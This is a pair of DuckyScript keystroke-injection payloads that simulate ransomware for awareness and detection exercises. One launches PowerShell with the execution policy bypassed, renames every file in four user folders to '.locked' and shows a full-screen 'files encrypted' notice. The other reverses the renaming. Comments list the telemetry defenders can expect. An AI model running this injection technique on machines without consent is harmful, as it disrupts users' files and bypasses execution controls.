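# Main
REM This script was created by github.com/MarkCyber
REM Ransomware-behaviour simulation for awareness and detection exercises.
REM Nothing is encrypted: every file directly inside the current user's Documents,
REM Desktop, Pictures and Music folders gets '.locked' appended to its name, then a
REM maximized, topmost window states that this is a simulation.
REM Changes made in review, all to keep a run reversible and accurately reported:
REM  - files already ending in .locked are skipped, so a second run cannot stack
REM    suffixes that the Cleanup payload (which strips one suffix) would leave behind
REM  - Rename-Item uses -LiteralPath, so a name containing [ or ] is not treated as a
REM    wildcard pattern that could match a different file
REM  - -ErrorAction Stop is set because Rename-Item reports most failures as
REM    non-terminating errors, which try/catch does not see; without it the
REM    'An error occurred' message could not appear
REM  - the trailing STRING exit / ENTER was removed: powershell -Command exits on its
REM    own, and the extra keystrokes went to whichever window had focus
REM Telemetry a defender can expect from this run: a Run-dialog entry under
REM HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, process creation of
REM powershell.exe with -ExecutionPolicy Bypass -Command (Security 4688 with command-line
REM auditing, or Sysmon event 1), script block logging (event 4104) if enabled, and a
REM burst of renames to one new extension across user folders.
DELAY 1000
GUI r
DELAY 1000
STRING powershell -NoProfile -ExecutionPolicy Bypass -Command " $locations = @('MyDocuments', 'Desktop', 'Pictures', 'Music'); $errorOccurred = $false; foreach ($loc in $locations) { $path = [Environment]::GetFolderPath($loc); $files = Get-ChildItem -Path $path -File | Where-Object { -not $_.Name.EndsWith('.locked') }; foreach ($file in $files) { try { Rename-Item -LiteralPath $file.FullName -NewName ($file.Name + '.locked') -ErrorAction Stop; } catch { $errorOccurred = $true; } } } if ($errorOccurred) { Write-Host 'An error occurred while renaming files'; } Add-Type -AssemblyName PresentationFramework; $Window = New-Object System.Windows.Window; $Window.WindowStartupLocation = 'CenterScreen'; $Window.WindowState = 'Maximized'; $Window.Topmost = $true; $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.'; $Window.ShowDialog(); "
ENTER

# Cleanup
REM This script was created by github.com/MarkCyber
REM Follow-up to the RansomwareSimulation payload: reverts its changes by stripping a
REM trailing '.locked' from files directly inside the same four user folders.
REM Limits to check after running it:
REM  - it acts on every *.locked file in those folders, including any that carried
REM    that suffix before the simulation ran
REM  - if the original name has been taken since, Rename-Item reports an error and the
REM    file keeps its .locked name, so review the folders for leftovers
REM -LiteralPath is used so names containing [ or ] are restored as-is, and the trailing
REM STRING exit / ENTER was removed for the same reason as in Main (PowerShell has
REM usually finished by then, so the keystrokes landed in the foreground window).
DELAY 1000
GUI r
DELAY 2000
STRING powershell -NoProfile -ExecutionPolicy Bypass -Command " $locations = @('MyDocuments', 'Desktop', 'Pictures', 'Music'); foreach ($loc in $locations) { $path = [Environment]::GetFolderPath($loc); $files = Get-ChildItem -Path $path -File | Where-Object { $_.Name.EndsWith('.locked') }; foreach ($file in $files) { Rename-Item -LiteralPath $file.FullName -NewName ($file.Name -replace '\.locked$', ''); } } "
ENTER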